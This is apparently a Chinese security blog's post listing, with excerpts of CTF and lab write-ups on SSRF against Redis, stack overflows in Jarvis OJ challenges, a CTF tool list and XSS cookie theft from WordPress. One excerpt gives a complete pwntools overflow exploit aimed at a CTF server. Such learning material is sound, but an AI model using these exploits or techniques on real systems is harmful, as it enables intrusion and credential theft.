自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(6)
  • 收藏
  • 关注

原创 ssrf+redis

ssrf+redis实验环境靶机:ubuntu16.04 ip:192.168.211.130在靶机中搭建lamp环境、安装redis、安装ssh攻击机:kali2020 ip:192.168.211.134在攻击机中安装redisvps:windows10(本机) ip:10.133.164.81在windows中安装cn.exe实验步骤1.将ssrf.php文件放在web根目录下ssrf.php:<?php$ch = curl_init();curl_set

2020-11-30 00:27:11 3818 2

原创 文件上传漏洞遇到的问题

访问php网页时出现乱码,在<?php 之前添加<meta http-equiv=“Content-Type” content=“text/html; charset=utf-8” />

2020-10-18 15:54:41 376 1

原创 jarivs oj中的level2与level2_x64

jarivs oj中的level2与level2_x64的相同与区别level2题目链接https://dn.jarvisoj.com/challengefiles/level2.54931449c557d0551c4fc2a10f4778a1对于这道题,按照基本思路就是先拖入ubuntu中进行查壳,输入checksec level2然后我们会发现它只打开了NX保护机制,又是典型的栈溢出...

2019-07-25 20:40:56 249 1

原创 攻防世界level0

from pwn import *p = remote("111.198.29.45","32092")call_system = 0x400596print p64(call_system)payload = 0x88*'a' + p64(call_system)p.sendline(payload)p.interactive()

2019-07-24 21:02:50 1334 2

原创 夺旗小软件

先来列举一下最近使用的应用软件1.Wireshark(具体用于流量分析)2.HXD(感觉可以用于各种东西分析的工具)3.Stegsolve(用于图片隐写)4.Audacity(用于音频隐写)5.Burpsuite(用于网页抓包的工具)6.御剑后台扫描工具(用于对一些域名进行扫描)以上这些软件在网页中现在均能找到,当然不止这些软件,可能以后会接触到更多软件,这里先对这些软件进行介绍。...

2019-07-20 16:02:12 329

原创 用XSS后台来捕获WordPress漏洞来获得cookie

关于cookiecookie实际上是指小量信息,对于这个大概就是存储用户的信息、密码的,但是这些信息具有时效性,有的信息存储的时间长,有的信息存储的时间短。关于XSSxss又叫css,即跨站脚本攻击。网页上解释为恶意攻击者网web页面里插入恶意的html代码,当用户浏览该页面时,便会执行该代码,从而达到恶意用户的特殊目的。“恶意之旅”开始当然这一切都是用自己网页来实践。List i...

2019-07-20 14:21:46 363

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除